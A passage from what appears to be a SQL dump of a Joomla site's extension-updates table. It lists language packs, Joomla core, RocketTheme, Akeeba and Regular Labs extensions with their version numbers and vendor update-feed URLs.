Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17570,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17571,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17572,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17573,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17574,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17575,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17576,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17577,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17578,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17579,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17580,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17581,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17582,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17583,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17584,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17585,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17586,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17587,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17588,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17589,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17590,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17591,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17592,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17593,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17594,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17595,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17596,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17597,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17598,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17599,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17600,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17601,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17602,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17603,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17604,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17605,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17606,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17607,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17608,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17609,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17610,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17611,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17612,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17613,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17614,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17615,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17616,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17617,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17618,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17619,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17620,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17621,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17622,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17623,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17624,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17625,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17626,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17627,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17628,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17629,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17630,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17631,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17632,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17633,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17634,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17635,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17636,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17637,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17638,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17639,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17640,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17641,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17642,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17643,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17644,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17645,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17646,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17647,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17648,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17649,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17650,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17651,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17652,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17653,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17654,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17655,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17656,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17657,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17658,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17659,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17660,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17661,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17662,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17663,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17664,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17665,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17666,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17667,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17668,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17669,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17670,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17671,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17672,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17673,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17674,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17675,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17676,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17677,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17678,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17679,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17680,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17681,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17682,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17683,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17684,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17685,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17686,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17687,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17688,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17689,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17690,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17691,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17692,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17693,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17694,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17695,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17696,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17697,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17698,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17699,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17700,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17701,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17702,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17703,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17704,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17705,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17706,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17707,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17708,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17709,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17710,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17711,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17712,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17713,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17714,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17715,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17716,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17717,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17718,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17719,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17720,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17721,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17722,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17723,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17724,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17725,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17726,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17727,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17728,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17729,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17730,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17731,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17732,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17733,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17734,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17735,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17736,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17737,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17738,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17739,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17740,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17741,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17742,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17743,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17744,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17745,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17746,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17747,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17748,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17749,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17750,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17751,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17752,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17753,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17754,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17755,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17756,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17757,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17758,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17759,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17760,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17761,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17762,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17763,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17764,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17765,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17766,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17767,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17768,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17769,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17770,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17771,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17772,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17773,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17774,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17775,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17776,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17777,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17778,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17779,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17780,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17781,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17782,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17783,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17784,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3